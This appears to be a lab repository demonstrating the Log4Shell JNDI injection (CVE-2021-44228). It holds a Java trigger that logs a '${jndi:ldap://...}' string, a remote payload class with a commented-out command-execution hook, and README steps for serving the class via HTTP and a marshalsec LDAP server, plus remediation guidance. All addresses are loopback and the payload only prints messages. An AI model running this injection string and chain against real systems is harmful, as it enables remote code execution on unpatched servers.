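├── .gitignore
├── src
│   └── main
│       └── java
│           ├── log4j.java
│           └── Log4jRCE.java
├── pom.xml
└── README.md

/.gitignore:
--------------------------------------------------------------------------------
.idea

--------------------------------------------------------------------------------
/src/main/java/log4j.java:
--------------------------------------------------------------------------------
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

/**
 * Trigger side of the Log4j JNDI lookup proof of concept (CVE-2021-44228).
 *
 * Logs one message that contains a {@code ${jndi:ldap://...}} lookup. With the
 * log4j-core version declared in pom.xml (2.14.1) message lookups are on by
 * default, so the logger resolves the JNDI reference against the LDAP server
 * started per the README, which in turn points at the HTTP server hosting
 * {@code Log4jRCE.class}; the JVM then loads and instantiates that class.
 *
 * Lab use only: every address is hard-coded to loopback (127.0.0.1).
 */
public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        // Harness-only setting. Current JDK releases default this property to
        // false, which blocks loading a class from the remote codebase named in
        // an LDAP Reference. It is enabled here so the PoC runs on a patched
        // JDK. A real target will not have it set, and exploitation there
        // relies on other vectors (deserialisation of the LDAP response, or
        // factory classes already on the target's classpath) that this PoC
        // does not demonstrate.
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");

        // The log level is irrelevant: any message that goes through lookup
        // substitution triggers the JNDI resolution.
        logger.error("${jndi:ldap://127.0.0.1:1389/Log4jRCE}");
    }
}

--------------------------------------------------------------------------------
/src/main/java/Log4jRCE.java:
--------------------------------------------------------------------------------
/**
 * Payload class served over HTTP to the PoC. Per the README it must be
 * compiled OUTSIDE this project, otherwise the local copy is found on the
 * classpath and the remote download never happens.
 *
 * The JNDI code loads the class and calls {@code newInstance()} on it, so the
 * static initialiser runs first (on class load) and the constructor second;
 * each prints a marker so the two stages are visible on the console. The
 * commented-out block marks where a real payload would run a command; it is
 * left disabled on purpose.
 */
public class Log4jRCE {

    static {
        // Runs once, as soon as the remote class is resolved.
        System.out.println("I am Log4jRCE from remote!!!");
        // try {
        //     String[] cmd = {"code"};
        //     java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        // } catch (Exception e) {
        //     e.printStackTrace();
        // }
    }

    public Log4jRCE() {
        // Runs on newInstance(), after the static initialiser.
        System.out.println("I am Log4jRCE from remote222!!!");
    }
}

--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>log4j-rce</artifactId>
    <version>1.0-SNAPSHOT</version>

    <dependencies>
        <!-- Deliberately vulnerable version: message lookups (and with them the
             JNDI lookup) are enabled by default in 2.14.1. Keep this pinned
             only for the lab; see README "修复方案" for the real fix. -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>

        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
    </dependencies>
</project>

--------------------------------------------------------------------------------
/README.md: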
--------------------------------------------------------------------------------
# Apache-Log4j
Apache Log4j 远程代码执行

> 攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响

> Lab use only. Every address in this PoC is loopback (127.0.0.1); do not point the LDAP/HTTP servers or the JNDI string at hosts you are not authorised to test.

### Steps
1. 【Important】***Move*** Log4jRCE.java out of this project, e.g. to /home/remote/Log4jRCE.java. If it stays on the project's classpath the JVM loads the local copy and the remote HTTP download never happens, so the PoC proves nothing.

2. Compile Log4jRCE.java and start an HTTP server that serves the resulting `.class` file
   1. `cd /home/remote`
   2. `javac Log4jRCE.java`
   3. start an HTTP server with Python or PHP, e.g. `php -S 127.0.0.1:8888`

3. Start the LDAP server
   1. `git clone git@github.com:mbechler/marshalsec.git` (use the HTTPS URL `https://github.com/mbechler/marshalsec.git` if you have no SSH key registered with GitHub)
   2. `cd marshalsec`
   3. `mvn clean package -DskipTests`
   4. start the LDAP server: `java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"`

4. Run log4j.java; you should see `I am Log4jRCE from remote!!!` followed by `I am Log4jRCE from remote222!!!` (static initializer first, then the constructor via `newInstance()`).

   Note: log4j.java sets `com.sun.jndi.ldap.object.trustURLCodebase=true` before logging. Current JDKs default this to `false`, which blocks loading a class from the remote codebase named in the LDAP reference; the PoC sets it only so the demo works on a patched JDK. A real target will not have it, so this PoC demonstrates the lookup and callback, not a JDK-independent RCE path.

### 触发步骤
1. 【重要】将Log4jRCE.java **挪出** 当前项目目录,比如挪到/home/remote/Log4jRCE.java,不然log4j.java运行时会读取到本地的Log4jRCE.java,就不走http远程下载了!

2. 编译Log4jRCE.java并启动http server
   1. 进入目录 `cd /home/remote`
   2. 编译 `javac Log4jRCE.java`
   3. 启动http server,python或php均可快速启动,如`php -S 127.0.0.1:8888`

3. 启动ldap server
   1. `git clone git@github.com:mbechler/marshalsec.git`
   2. `cd marshalsec`
   3. `mvn clean package -DskipTests`
   4. 启动ldap server `java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"`

4. 启动log4j.java,然后就会发现命令行出现了`I am Log4jRCE from remote!!!`。底层就是会远程下载Log4jRCE.class,然后执行newInstance(),所以会执行static、构造函数代码。

### 修复方案:

(1)修改jvm参数
-Dlog4j2.formatMsgNoLookups=true

(2)修改配置
在应用classpath下添加log4j2.component.properties配置文件,log4j2.formatMsgNoLookups=true

> Caveat on (1) and (2): `log4j2.formatMsgNoLookups` is honoured only by log4j-core 2.10 and later, and it was later shown to be incomplete (CVE-2021-45046: lookups remain reachable through non-default PatternLayout configurations). Treat these as a stop-gap. The actual fix is upgrading log4j-core to a release with the JNDI lookup removed or disabled (2.17.1 or newer for Java 8+); if you cannot upgrade, delete `org/apache/logging/log4j/core/lookup/JndiLookup.class` from the log4j-core jar. In either case check for other copies of log4j-core (shaded or bundled jars) left on the classpath.

> 注意:上述两项只是临时缓解(仅对 2.10 及以上版本生效,且后续证明并不完整,见 CVE-2021-45046)。正式修复应将 log4j-core 升级到 2.17.1 及以上,或从 jar 中删除 JndiLookup.class,并检查 classpath 上是否还有其他被打包进来的 log4j-core 副本。
--------------------------------------------------------------------------------